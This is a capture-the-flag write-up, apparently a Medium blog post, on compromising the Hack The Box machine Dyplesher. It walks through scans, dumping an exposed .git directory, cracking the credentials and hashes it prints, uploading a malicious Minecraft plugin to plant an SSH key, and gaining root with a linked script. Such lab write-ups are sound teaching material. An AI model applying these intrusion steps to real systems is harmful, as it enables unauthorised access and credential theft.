Hackthebox — Dyplesher

Summary

Today we have another linux machine is retired with IP 10.10.10.190

Enumeration

Nmap

root@strike:~# nmap -sC -sV 10.10.10.190
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-15 14:48 EET
Nmap scan report for 10.10.10.190
Host is up (0.079s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7e:ca:81:78:ec:27:8f:50:60:db:79:cf:97:f7:05:c0 (RSA)
| 256 e0:d7:c7:9f:f2:7f:64:0d:40:29:18:e1:a1:a0:37:5e (ECDSA)
|_ 256 9f:b2:4c:5c:de:44:09:14:ce:4f:57:62:0b:f9:71:81 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Dyplesher
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gogs=968c960820a086d9; Path=/; HttpOnly
| Set-Cookie: _csrf=zfXkCZCCL03J-dCZ6lH25oupVLg6MTU5MjIyNTY4NDkwODc4OTk3Ng%3D%3D; Path=/; Expires=Tue, 16 Jun 2020 12:54:44 GMT; HttpOnly
| Date: Mon, 15 Jun 2020 12:54:44 GMT
| <!DOCTYPE html>
| <html>
| <head data-suburl="">
| <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
| <meta name="author" content="Gogs" />
| <meta name="description" content="Gogs is a painless self-hosted Git service" />
| <meta name="keywords" content="go, git, self-hosted, gogs">
| <meta name="referrer" content="no-referrer" />
| <meta name="_csrf" content="zfXkCZCCL03J-dCZ6lH25oupVLg6MTU5MjIyNTY4NDkwODc4OTk3Ng==" />
| <meta name="_suburl" content="" />
| <meta proper
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gogs=4228884f43ce6ee5; Path=/; HttpOnly
| Set-Cookie: _csrf=8sEcAMp478CzoxzyIS5f8nL8ZPg6MTU5MjIyNTY5MDU4Njg0NzI2OA%3D%3D; Path=/; Expires=Tue, 16 Jun 2020 12:54:50 GMT; HttpOnly
| Date: Mon, 15 Jun 2020 12:54:50 GMT
| <!DOCTYPE html>
| <html>
| <head data-suburl="">
| <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
| <meta name="author" content="Gogs" />
| <meta name="description" content="Gogs is a painless self-hosted Git service" />
| <meta name="keywords" content="go, git, self-hosted, gogs">
| <meta name="referrer" content="no-referrer" />
| <meta name="_csrf" content="8sEcAMp478CzoxzyIS5f8nL8ZPg6MTU5MjIyNTY5MDU4Njg0NzI2OA==" />
| <meta name="_suburl" content="" />
|_ <meta
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.70%I=7%D=6/15%Time=5EE76E3F%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,2063,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\
SF:x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/;
SF:\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gogs=968c960820a086d9;\
SF:x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=zfXkCZCCL03J-dCZ6lH25oup
SF:VLg6MTU5MjIyNTY4NDkwODc4OTk3Ng%3D%3D;\x20Path=/;\x20Expires=Tue,\x2016\
SF:x20Jun\x202020\x2012:54:44\x20GMT;\x20HttpOnly\r\nDate:\x20Mon,\x2015\x
SF:20Jun\x202020\x2012:54:44\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<he
SF:ad\x20data-suburl=\"\">\n\t<meta\x20http-equiv=\"Content-Type\"\x20cont
SF:ent=\"text/html;\x20charset=UTF-8\"\x20/>\n\t<meta\x20http-equiv=\"X-UA
SF:-Compatible\"\x20content=\"IE=edge\"/>\n\t\n\t\t<meta\x20name=\"author\
SF:"\x20content=\"Gogs\"\x20/>\n\t\t<meta\x20name=\"description\"\x20conte
SF:nt=\"Gogs\x20is\x20a\x20painless\x20self-hosted\x20Git\x20service\"\x20
SF:/>\n\t\t<meta\x20name=\"keywords\"\x20content=\"go,\x20git,\x20self-hos
SF:ted,\x20gogs\">\n\t\n\t<meta\x20name=\"referrer\"\x20content=\"no-refer
SF:rer\"\x20/>\n\t<meta\x20name=\"_csrf\"\x20content=\"zfXkCZCCL03J-dCZ6lH
SF:25oupVLg6MTU5MjIyNTY4NDkwODc4OTk3Ng==\"\x20/>\n\t<meta\x20name=\"_subur
SF:l\"\x20content=\"\"\x20/>\n\t\n\t\n\t\n\t\t<meta\x20proper")%r(Help,67,
SF:"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20
SF:charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(
SF:HTTPOptions,189F,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20
SF:text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/;\x2
SF:0Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gogs=4228884f43ce6ee5;\x20
SF:Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=8sEcAMp478CzoxzyIS5f8nL8ZPg
SF:6MTU5MjIyNTY5MDU4Njg0NzI2OA%3D%3D;\x20Path=/;\x20Expires=Tue,\x2016\x20
SF:Jun\x202020\x2012:54:50\x20GMT;\x20HttpOnly\r\nDate:\x20Mon,\x2015\x20J
SF:un\x202020\x2012:54:50\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head\
SF:x20data-suburl=\"\">\n\t<meta\x20http-equiv=\"Content-Type\"\x20content
SF:=\"text/html;\x20charset=UTF-8\"\x20/>\n\t<meta\x20http-equiv=\"X-UA-Co
SF:mpatible\"\x20content=\"IE=edge\"/>\n\t\n\t\t<meta\x20name=\"author\"\x
SF:20content=\"Gogs\"\x20/>\n\t\t<meta\x20name=\"description\"\x20content=
SF:\"Gogs\x20is\x20a\x20painless\x20self-hosted\x20Git\x20service\"\x20/>\
SF:n\t\t<meta\x20name=\"keywords\"\x20content=\"go,\x20git,\x20self-hosted
SF:,\x20gogs\">\n\t\n\t<meta\x20name=\"referrer\"\x20content=\"no-referrer
SF:\"\x20/>\n\t<meta\x20name=\"_csrf\"\x20content=\"8sEcAMp478CzoxzyIS5f8n
SF:L8ZPg6MTU5MjIyNTY5MDU4Njg0NzI2OA==\"\x20/>\n\t<meta\x20name=\"_suburl\"
SF:\x20content=\"\"\x20/>\n\t\n\t\n\t\n\t\t<meta");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.99 seconds
root@strike:~#

We have 3 open ports: 22(ssh), 80(http), 3000(…)

Web Enumerate

I found another hosts,So i add it for /etc/hosts directory
Open

Try to FUZZ

root@strike:~# wfuzz -u http://test.dyplesher.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt --hc 404,403 -c

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://test.dyplesher.htb/FUZZ
Total requests: 4614

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000001: C=200 14 L 27 W 239 Ch ""
000009: C=200 1 L 2 W 23 Ch ".git/HEAD"
000094: C=404 9 L 31 W 280 Ch "_vti_bin/_vti_adm/adm000095: C=404 9 L 31 W 280 Ch "_vti_bin/_vti_aut/aut000320: C=404 9 L 31 W 280 Ch "administratoraccounts001160: C=404 9 L 31 W 280 Ch "database_administrati001161: C=404 9 L 31 W 280 Ch "Database_Administrati001326: C=404 9 L 31 W 280 Ch "Documents and Setting002021: C=200 14 L 27 W 239 Ch "index.php"
003946: C=404 9 L 31 W 280 Ch "system_administration003949: C=404 9 L 31 W 280 Ch "system-administration
Total time: 38.83439
Processed Requests: 4614
Filtered Requests: 4611
Requests/sec.: 118.8122

root@strike:~#

I found .git, But i can’t get access from browser, So i tried to dump the content using gitdumb tool

root@strike:~/git-dumper# ./git-dumper.py http://test.dyplesher.htb/.git /root/Dsktop/dump
[-] Testing http://test.dyplesher.htb/.git/HEAD [200]
[-] Testing http://test.dyplesher.htb/.git/ [403]
[-] Fetching common files
[-] Fetching http://test.dyplesher.htb/.gitignore [404]
[-] Fetching http://test.dyplesher.htb/.git/COMMIT_EDITMSG [200]
[-] Fetching http://test.dyplesher.htb/.git/description [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/post-commit.sample [404]
[-] Fetching http://test.dyplesher.htb/.git/hooks/commit-msg.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/post-receive.sample [404]
[-] Fetching http://test.dyplesher.htb/.git/hooks/post-update.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-commit.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-receive.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/index [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/info/packs [404]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-push.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/update.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/info/exclude [200]
[-] Finding refs/
[-] Fetching http://test.dyplesher.htb/.git/FETCH_HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/HEAD [200]
[-] Fetching http://test.dyplesher.htb/.git/ORIG_HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/config [200]
[-] Fetching http://test.dyplesher.htb/.git/info/refs [404]
[-] Fetching http://test.dyplesher.htb/.git/logs/HEAD [200]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/heads/master [200]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/remotes/origin/HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/remotes/origin/master [200]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/stash [404]
[-] Fetching http://test.dyplesher.htb/.git/packed-refs [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/heads/master [200]
[-] Fetching http://test.dyplesher.htb/.git/refs/remotes/origin/HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/remotes/origin/master [200]
[-] Fetching http://test.dyplesher.htb/.git/refs/stash [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/wip/wtree/refs/heads/master [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/wip/index/refs/heads/master [404]
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching http://test.dyplesher.htb/.git/objects/27/29b565f353181a03b2e2edb030a0e2b33d9af0 [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/00/00000000000000000000000000000000000000 [404]
[-] Fetching http://test.dyplesher.htb/.git/objects/b1/fe9eddcdf073dc45bb406d47cde1704f222388 [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/3f/91e452f3cbfa322a3fbd516c5643a6ebffc433 [200]
[-] Running git checkout .
root@strike:~/git-dumper#

After dump i found credentials for Memcached username felamos, password zxcvbnm and service port 11211 in index.php
Let’s take a look using memchached-cli

root@strike:~#memcached-cli felamos:zxcvbnm@dyplesher.htb
dyplesher.htb> get username
MinatoTWfelamosyuntao
dyplesher.htb>getpassword
$2a$10$5SAkMNF9fPNamlpWr.ikte0rHInGcU54tvazErpuwGPFePuI1DCJa
$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK
$2a$10$zXNCus.UXtiuJE5e6lsQGefnAH3zipl.FRNySz5C4RjitiwUoalS

Tried to crack with john

After that i decided to take a look for http://dyplesher.htb:3000 , I register and login

In felamos we could find gitlab.git and memcached.git
I tried to login with felamos credentials

Let’s download repo.zip and unzip

root@strike:~# cd Downloads/
root@strike:~/Downloads# unzip repo.zip
Archive: repo.zip
creating: repositories/
creating: repositories/@hashed/
creating: repositories/@hashed/4b/
creating: repositories/@hashed/4b/22/
inflating: repositories/@hashed/4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle
creating: repositories/@hashed/4e/
creating: repositories/@hashed/4e/07/
creating: repositories/@hashed/4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/
inflating: repositories/@hashed/4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle
creating: repositories/@hashed/6b/
creating: repositories/@hashed/6b/86/
inflating: repositories/@hashed/6b/86/6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle
creating: repositories/@hashed/d4/
creating: repositories/@hashed/d4/73/
inflating: repositories/@hashed/d4/73/d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle
root@strike:~/Downloads#

I dump this 4 hashes that end with .bundle in hash.sh file

root@strike:~/Downloads# cat hash.sh 
git clone 4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle
git clone 4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle
git clone 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle
git clone d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle
root@strike:~/Downloads# chmod +x hash.sh
root@strike:~/Downloads# ./hash.sh
Cloning into '4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a'...Receiving objects: 100% (39/39), 10.46 KiB | 10.46 MiB/s, done.Resolving deltas: 100% (12/12), done.Cloning into '4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce'...Receiving objects: 100% (51/51), 20.94 MiB | 59.55 MiB/s, done.Resolving deltas: 100% (5/5), done.Cloning into '6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'...Receiving objects: 100% (85/85), 30.69 KiB | 10.23 MiB/s, done.Resolving deltas: 100% (40/40), done.Cloning into 'd4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35'...Receiving objects: 100% (21/21), 16.98 KiB | 16.98 MiB/s, done.Resolving deltas: 100% (9/9), done.
root@strike:~/Downloads#

After searching i found user.db file and it contain hash

$2a$10$IRgHi7pBhb9K0QBQBOzOju0PyOZhBnK4yaWjeZYdeP6oyDvCo9vc6

So let’s crack

Login again with new credentials user: felamos@dyplesher.htb and password: alexis1

Then I found the page “AddPlugin” and tried to add some files to see its response

We can also see that http://test.dyplesher.htb is deployed under /var/www/test/ and is owned by MinatoTW

For the IDE where we’ll write the Minecraft plugin we can eitheir use Eclipse

Use this method to creating a blank Spigot plugin

After puttinng your public key authorized_keys , Upload it on http://dyplesher.htb/home/add and load it on http://dyplesher.htb/home/reload

Now connect via SSH to MinatoTW account with your key

root@strike:~/Desktop#ssh -i id_rsa MinatoTW@dyplesher.htb
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-46-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 15 Jun 2020 03:05:00 PM UTC

System load: 0.37 Processes: 238
Usage of /: 6.7% of 97.93GB Users logged in: 0
Memory usage: 39% IP address for ens33: 10.10.10.190
Swap usage: 0% IP address for docker0: 172.17.0.1


57 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
MinatoTW@dyplesher:~$

But i didn’t find user flag, After searching i found that the user of MinatoTW is wireshark so we need to download and analyzing
Try to download capture.pcap

I found credentials for some users
*MinatoTW : bihys1amFov
*yuntao : wagthAw4ob / EashAnicOc3Op
*felamos : tieb0graQueg

Try to get felamos with this password

Gain user flag!

Privilege Escalation

I found lua is running, So we could use malicious plugin to get root

Plugin for lus and python script
https://github.com/khanmoin/htb_scripts/tree/master/rabbitmq_dyp

  • Write lua script on dyplesher machine with own id_rsa.pub

Write python script on our device

Lunch python server on dyplesher machine

Running python script

Response

Let’s try to connect

It work!
Gain root flag!

If u learn any thing useful from write up, Respect me on HackTheBox

Thx for ur time!

--

--

--

CTFer | Computer Science Student

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Array in Java

Generics in Swift

DataFinz | API Integration, Trading Partner Management, Data Management

SANS Holiday Hack Challenge 2020: Speaker UnPrep Door

Docker Pre-requisites

2nd Our World AMA 25th Nov @ 5pm UK time

Why I’m ditching Centos for Ubuntu

Evolution and Recent Trends in Web Development

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmed Samir

Ahmed Samir

CTFer | Computer Science Student

More from Medium

Attacktive Directory TryHackMe

Dig Dug — A TryHackMe Writeup

TryHackMe: Pentesting Fundamentals a Walkthrough

Flatline THM Walkthrough